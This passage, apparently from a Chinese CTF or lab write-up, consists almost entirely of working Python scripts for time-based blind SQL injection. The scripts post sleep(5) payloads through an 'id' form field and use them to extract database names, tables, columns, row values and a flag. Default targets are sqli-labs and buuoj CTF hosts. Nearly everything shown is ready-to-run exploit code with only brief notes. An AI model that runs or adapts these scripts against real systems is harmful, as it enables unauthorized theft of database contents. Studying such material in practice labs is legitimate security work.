    which column to dump; entering 0 at the column prompt ends the loop.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("({0}){1}".format(number, name))
    # Menu numbers are 1-based, list indices 0-based.
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    chosen_table = DBTables[tableIndex]
    GetDBColumns(url, DBName, chosen_table)
    while True:
        print("[+]数据表{0}的字段如下:".format(chosen_table))
        for number, name in enumerate(DBColumns, 1):
            print("({0}){1}".format(number, name))
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        GetDBData(url, chosen_table, DBColumns[columnIndex])
if __name__ == '__main__':
    try:
        # The usage string still names the GET variant of the script.
        parser = OptionParser("./BlindTime_get.py -u url")
        parser.add_option('-u', '--url', dest='url',
                          default='http://localhost/Less-15/',
                          type='string', help='target URL')
        options, _ = parser.parse_args()
        # The work runs on a separate thread; note the except below only
        # covers option parsing and thread start-up, not the worker itself.
        worker = threading.Thread(target=StartSqli, args=(options.url,))
        worker.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")
整体改动过的脚本Time-POST
修改的地方:
payload
data
添加了time.sleep(0.05)
default
修改时要注意间隔
python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# Results collected by the Get* functions below; each of them writes into
# one of these module-level containers through a `global` statement.
DBName = ""      # name of the current database
DBTables = []    # table names recovered for DBName
DBColumns = []   # column names recovered for the table the user picked
DBData = {}      # column name -> list of values recovered for that column
# Retry a few times and disable keep-alive so that a long run of small
# requests does not fail with "Max retries exceeded with url".
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.Session()
conn.keep_alive = False
# 获取数据库名函数
def GetDBName(url):
    """Recover the current database name one character at a time.

    Every recovered character is appended to the module-level ``DBName``.
    A probe is a POST of a single ``id`` form field; the condition inside
    it is treated as true when the request takes at least 5 s to complete.

    Args:
        url: URL the form is posted to.
    """
    global DBName

    def delayed(payload):
        # Wall-clock time around the request decides the probe's outcome.
        started = time.time()
        conn.post(url, data={'id': payload})
        return time.time() - started >= 5

    print("[-]开始获取数据库名长度")
    # Step 1: the name length (loop variable stays at 98 if no match).
    length_probe = "if(length(database())={0},sleep(5),0)"
    name_len = 0
    for name_len in range(1, 99):
        if delayed(length_probe.format(name_len)):
            print("[+]数据库名长度:" + str(name_len))
            break

    print("[-]开始获取数据库名")
    # Step 2: one position at a time, trying ASCII codes 33..127, with a
    # short pause before every probe.
    char_probe = "if(ascii(substr(database(),{0},1))={1},sleep(5),0)"
    for pos in range(1, name_len + 1):
        for code in range(33, 128):
            time.sleep(0.05)
            if delayed(char_probe.format(pos, code)):
                DBName += chr(code)
                print("[-]" + DBName)
                break
# 获取数据库表函数
def GetDBTables(url, dbname):
    """Recover the table names of schema *dbname* and append them to ``DBTables``.

    Every probe is preceded by a 0.05 s pause.

    Args:
        url: URL the ``id`` form field is posted to.
        dbname: schema name interpolated into every probe.
    """
    global DBTables

    def delayed(payload):
        # A response that took >= 5 s means the sleep(5) branch ran.
        started = time.time()
        conn.post(url, data={'id': payload})
        return time.time() - started >= 5

    # Step 1: number of tables (loop variable stays at 98 if nothing matches).
    print("[-]开始获取{0}数据库表数量:".format(dbname))
    count_probe = "if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0)"
    table_count = 0
    for table_count in range(1, 99):
        time.sleep(0.05)
        if delayed(count_probe.format(dbname, table_count)):
            print("[+]{0}数据库的表数量为:{1}".format(dbname, table_count))
            break

    print("[-]开始获取{0}数据库的表".format(dbname))
    len_probe = "if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0)"
    char_probe = "if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)"
    name_len = 0
    for index in range(0, table_count):
        print("[-]正在获取第{0}个表名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(1, 99):
            time.sleep(0.05)
            if delayed(len_probe.format(dbname, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                time.sleep(0.05)
                if delayed(char_probe.format(dbname, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBTables.append(name)
# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):
    """Recover the column names of *dbtable* and append them to ``DBColumns``.

    Every probe is preceded by a 0.05 s pause.

    Args:
        url: URL the ``id`` form field is posted to.
        dbname: schema name interpolated into every probe.
        dbtable: table name interpolated into every probe.
    """
    global DBColumns

    def delayed(payload):
        # A response that took >= 5 s means the sleep(5) branch ran.
        started = time.time()
        conn.post(url, data={'id': payload})
        return time.time() - started >= 5

    # Step 1: number of columns, candidates 0..98.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    count_probe = "if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0)"
    column_count = 0
    for column_count in range(99):
        time.sleep(0.05)
        if delayed(count_probe.format(dbname, dbtable, column_count)):
            print("[-]{0}数据表的字段数为:{1}".format(dbtable, column_count))
            break

    len_probe = "if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0)"
    char_probe = "if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0)"
    for index in range(0, column_count):
        print("[-]正在获取第{0}个字段名".format(index + 1))
        # Step 2a: length of the index-th name (stays at 98 if no match).
        for name_len in range(99):
            time.sleep(0.05)
            if delayed(len_probe.format(dbname, dbtable, index, name_len)):
                break
        # Step 2b: the name itself, position by position.
        name = ""
        for pos in range(1, name_len + 1):
            for code in range(33, 128):
                time.sleep(0.05)
                if delayed(char_probe.format(dbname, dbtable, index, pos, code)):
                    name += chr(code)
                    print(name)
                    break
        DBColumns.append(name)
# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):
    """Recover every value of column *dbcolumn* in table *dbtable*.

    Values are appended to ``DBData[dbcolumn]`` (created on first use) and
    the whole ``DBData`` dict is printed after each value. Every probe is
    preceded by a 0.05 s pause.

    Args:
        url: URL the ``id`` form field is sent to.
        dbtable: table name interpolated into every probe.
        dbcolumn: column name interpolated into every probe.
    """
    global DBData

    def delayed(send, payload):
        # `send` is the session method used for this probe; a response that
        # took >= 5 s means the sleep(5) branch ran.
        started = time.time()
        send(url, data={'id': payload})
        return time.time() - started >= 5

    # Step 1: number of rows, candidates 0..98.
    print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
    count_probe = "if((select count({0}) from {1})={2},sleep(5),0)"
    row_count = 0
    for row_count in range(99):
        time.sleep(0.05)
        if delayed(conn.post, count_probe.format(dbcolumn, dbtable, row_count)):
            print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, row_count))
            break

    len_probe = "if((select length({0}) from {1} limit {2},1)={3},sleep(5),0)"
    char_probe = "if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0)"
    for row in range(0, row_count):
        print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, row + 1))
        # Step 2a: length of this row's value (stays at 98 if no match).
        value_len = 0
        for value_len in range(99):
            time.sleep(0.05)
            if delayed(conn.post, len_probe.format(dbcolumn, dbtable, row, value_len)):
                print("[-]第{0}个数据长度为:{1}".format(row + 1, value_len))
                break
        # Step 2b: the value itself, position by position. These probes go
        # out through conn.get (with the form as body), not conn.post.
        value = ""
        for pos in range(1, value_len + 1):
            for code in range(33, 128):
                time.sleep(0.05)
                if delayed(conn.get, char_probe.format(dbcolumn, dbtable, row, pos, code)):
                    value += chr(code)
                    print(value)
                    break
        DBData.setdefault(dbcolumn, []).append(value)
        print(DBData)
# 盲注主函数
def StartSqli(url):
    """Interactive driver: database name, tables, then columns and values.

    Asks the user (via ``input``) which table to inspect, then repeatedly
    which column to dump; entering 0 at the column prompt ends the loop.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for number, name in enumerate(DBTables, 1):
        print("({0}){1}".format(number, name))
    # Menu numbers are 1-based, list indices 0-based.
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    chosen_table = DBTables[tableIndex]
    GetDBColumns(url, DBName, chosen_table)
    while True:
        print("[+]数据表{0}的字段如下:".format(chosen_table))
        for number, name in enumerate(DBColumns, 1):
            # A short pause between menu lines (no request is made here).
            time.sleep(0.05)
            print("({0}){1}".format(number, name))
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if columnIndex == -1:
            break
        GetDBData(url, chosen_table, DBColumns[columnIndex])
if __name__ == '__main__':
    try:
        # The usage string still names the GET variant of the script.
        parser = OptionParser("./BlindTime_get.py -u url")
        parser.add_option('-u', '--url', dest='url',
                          default='http://1e21f92c-e6dd-42ac-95f0-ed1281e49749.node4.buuoj.cn:81/',
                          type='string', help='target URL')
        options, _ = parser.parse_args()
        # The work runs on a separate thread; note the except below only
        # covers option parsing and thread start-up, not the worker itself.
        worker = threading.Thread(target=StartSqli, args=(options.url,))
        worker.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")
时间盲注-POST-1
python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
from optparse import OptionParser
import time
import threading
# Module-level result containers kept from the fuller scripts; in this
# script only `conn` is actually used (by woqv), the rest stay empty.
DBName = ""      # name of the current database
DBTables = []    # table names
DBColumns = []   # column names
DBData = {}      # column name -> list of values
# Retry a few times and disable keep-alive so that a long run of small
# requests does not fail with "Max retries exceeded with url".
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.Session()
conn.keep_alive = False
def woqv(url):
    """Recover, character by character, the value selected by the probe's
    ``select(flag)from(flag)`` sub-query using time-delay probes.

    Positions 1..49 are tried; for each position the ASCII codes 33..126
    are probed and the first one whose POST takes at least 5 s is taken
    as the character. The running text is printed after every character
    and kept only in a local variable (nothing is stored globally).
    Every probe is preceded by a 0.05 s pause.

    Args:
        url: URL the ``id`` form field is posted to.
    """
    recovered = ""
    # The banner text is inherited from the database-name routine.
    print("[-]开始获取数据库名长度")
    probe = "if((ascii(substr((select(flag)from(flag)),{0},1))={1}),sleep(5),0)"
    for pos in range(1, 50):
        for code in range(33, 127):
            time.sleep(0.05)
            started = time.time()
            conn.post(url, data={'id': probe.format(pos, code)})
            # A response that took >= 5 s means the sleep(5) branch ran.
            if time.time() - started >= 5:
                recovered += chr(code)
                print(recovered)
                break
# 盲注主函数
def StartSqli(url):
    """Entry point used by the worker thread; delegates to ``woqv``."""
    return woqv(url)
if __name__ == '__main__':
    try:
        # The usage string still names the GET variant of the script.
        parser = OptionParser("./BlindTime_get.py -u url")
        parser.add_option('-u', '--url', dest='url',
                          default='http://4fbbc7a5-c5b9-4628-b997-a2c82c97252d.node4.buuoj.cn:81/',
                          type='string', help='target URL')
        options, _ = parser.parse_args()
        # The work runs on a separate thread; note the except below only
        # covers option parsing and thread start-up, not the worker itself.
        worker = threading.Thread(target=StartSqli, args=(options.url,))
        worker.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")